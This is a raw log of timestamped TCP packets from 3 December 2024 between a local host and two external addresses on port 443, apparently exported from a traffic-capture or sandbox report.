                                                                                                                      Dec 3, 2024 08:55:40.896367073 CET50001443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.896367073 CET50001443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.899198055 CET50018443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.899226904 CET4435001813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.899291039 CET50018443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.899471998 CET50018443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.899486065 CET4435001813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.903290987 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.903563023 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.903574944 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.904601097 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.904660940 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.905004978 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.905054092 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.905174017 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.905179024 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.932920933 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.933248043 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.933269978 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.933648109 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.934349060 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.934431076 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.934489965 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.952795029 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.979336977 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.079637051 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.079659939 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.079757929 CET50000443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.079780102 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.087924957 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.087985992 CET50000443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.087996960 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.089420080 CET50000443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.089463949 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.089529037 CET50000443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.090305090 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.090384960 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.090464115 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.091022968 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.091056108 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.183422089 CET4435000613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.184026003 CET50006443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.184063911 CET4435000613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.184603930 CET50006443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.184612036 CET4435000613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.197252989 CET50001443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.197268009 CET4435000113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.286756039 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.286840916 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.286861897 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.286881924 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.286921978 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.286972046 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.287014961 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.293621063 CET4435000713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.294152021 CET50007443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.294190884 CET4435000713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.294661999 CET50007443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.294675112 CET4435000713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.338905096 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.517158031 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.517184973 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.517219067 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.517272949 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.517329931 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.530900002 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.530931950 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.530950069 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.531044960 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.531044960 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.535471916 CET4435000813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.535981894 CET50008443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.535999060 CET4435000813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.536519051 CET50008443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.536526918 CET4435000813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.547802925 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.547821999 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.547838926 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.547900915 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.548072100 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.567435026 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.567444086 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.567537069 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.627049923 CET4435000613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.630652905 CET4435000613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.630705118 CET4435000613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.630826950 CET50006443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.630827904 CET50006443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.630827904 CET50006443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.630827904 CET50006443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.633837938 CET50020443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.633867025 CET4435002013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.633936882 CET50020443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.634085894 CET50020443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.634098053 CET4435002013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.722713947 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.722743988 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.722770929 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.722851992 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.722861052 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.723053932 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.724863052 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.724895000 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.724951982 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.725281000 CET50021443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.725318909 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.725382090 CET50021443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.726352930 CET50021443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.726366997 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.739823103 CET4435000713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.742666960 CET4435000713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.742899895 CET50007443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.744673967 CET50007443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.744673967 CET50007443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.744714022 CET4435000713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.744740009 CET4435000713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.751041889 CET50022443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.751080036 CET4435002213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.751141071 CET50022443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.751632929 CET50022443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.751645088 CET4435002213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.766351938 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.766366005 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.766447067 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.775685072 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.775708914 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.775907040 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.775919914 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.775953054 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.775964975 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.776031017 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.790195942 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.790204048 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.790288925 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.804598093 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.804800034 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.822912931 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.823091030 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.823807955 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.836904049 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.837094069 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.850980043 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.851165056 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.860812902 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.861151934 CET50009443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.861179113 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.861537933 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.861840963 CET50009443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.861918926 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.861987114 CET50009443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.864993095 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.865061998 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.907327890 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.933770895 CET50006443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.933800936 CET4435000613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.963936090 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.964521885 CET50011443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.964548111 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.964915037 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.965861082 CET50011443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.965861082 CET50011443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:41.965936899 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.980063915 CET4435000813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.983812094 CET4435000813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.983921051 CET50008443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.984069109 CET50008443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.984069109 CET50008443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.984088898 CET4435000813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.984101057 CET4435000813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.986735106 CET50023443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.986850023 CET4435002313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:41.986946106 CET50023443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.987075090 CET50023443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:41.987111092 CET4435002313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.011343002 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.011630058 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.011862993 CET50011443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.018856049 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.018966913 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.020059109 CET4435001013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.028580904 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.028667927 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.031114101 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.031126976 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.031305075 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.036679029 CET50010443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:42.036711931 CET4435001013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.037182093 CET50010443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:42.037193060 CET4435001013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.038001060 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.038080931 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.040282011 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.040349007 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.040359974 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.040374041 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.040400982 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.040436983 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.040731907 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.040746927 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.041106939 CET50024443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.041146994 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.041204929 CET50024443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.042594910 CET50024443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.042608023 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.050493002 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.050584078 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.059979916 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.060067892 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.069622040 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.069709063 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.078988075 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.079180956 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.091681957 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.091753960 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.101212978 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.101274967 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.112159014 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.112221956 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.121675968 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.121746063 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.131309986 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.131395102 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.143795967 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.143881083 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.202884912 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.203131914 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.209934950 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.210020065 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.220976114 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.221158981 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.263480902 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.263595104 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.267776966 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.267855883 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.271116018 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.271187067 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.275396109 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.275484085 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.278743982 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.278819084 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.282027960 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.282099962 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.285249949 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.285319090 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.289555073 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.289622068 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.292795897 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.292877913 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.296622992 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.296710968 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.300112009 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.300206900 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.303328991 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.303407907 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.307548046 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.307632923 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.310882092 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.310970068 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.356363058 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.394098043 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.394115925 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.395076990 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.395163059 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.395163059 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.395205975 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.395216942 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.395258904 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.395699024 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.395762920 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.395908117 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.395916939 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.396262884 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.396296024 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.396773100 CET50025443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.396815062 CET44350025196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.396871090 CET50025443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.397665977 CET50025443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.397686005 CET44350025196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.448438883 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.449094057 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.449323893 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.449341059 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.450340986 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.450411081 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.450689077 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.450751066 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.450792074 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.465871096 CET4435001013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.468955040 CET4435001013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.469228029 CET50010443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:42.469228029 CET50010443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:42.469228029 CET50010443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:42.471980095 CET50026443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:42.472002983 CET4435002613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.472110987 CET50026443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:42.472304106 CET50026443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:42.472318888 CET4435002613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.486135006 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.486372948 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.486402035 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.487515926 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.487673044 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.487880945 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.487953901 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.488033056 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.488053083 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.491336107 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.496334076 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.496340990 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.523900032 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.524238110 CET50013443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.524255037 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.524606943 CET44350013196.22.142.143192.168.2.4
